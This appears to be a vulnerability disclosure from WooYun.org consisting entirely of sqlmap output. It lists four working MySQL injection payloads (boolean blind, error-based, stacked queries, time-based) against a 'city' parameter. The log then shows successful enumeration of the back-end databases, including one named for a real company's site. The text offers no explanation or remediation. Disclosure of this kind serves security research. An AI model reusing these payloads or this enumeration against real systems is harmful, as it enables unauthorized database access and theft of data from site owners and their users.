WooYun.org

Place: POST
Parameter: city
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus
e (RLIKE)
    Payload: city=bj' RLIKE IF(1358=1358,0x626a,0x28) AND 'QVHv'='QVHv&hid=3267&
num=0,0,0,0,0,0,12.5,0
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: city=bj' AND (SELECT 7030 FROM(SELECT COUNT(*),CONCAT(0x3a6f786d3a,
(SELECT (CASE WHEN (7030=7030) THEN 1 ELSE 0 END)),0x3a796f663a,FLOOR(RAND(0)*2)
)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uVwS'='uVwS&hid=326
7&num=0,0,0,0,0,0,12.5,0
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: city=bj'; SELECT SLEEP(10)-- &hid=3267&num=0,0,0,0,0,0,12.5,0
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: city=bj' AND SLEEP(10) AND 'KWCc'='KWCc&hid=3267&num=0,0,0,0,0,0,12
.5,0
---
[21:05:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[21:05:55] [INFO] fetching database names
[21:05:55] [INFO] the SQL query used returns 3 entries
[21:05:55] [INFO] retrieved: information_schema
[21:05:55] [INFO] retrieved: biz_sydc_sina_com_cn
[21:05:55] [INFO] retrieved: test
available databases [3]:
[*] biz_sydc_sina_com_cn
[*] information_schema
[*] test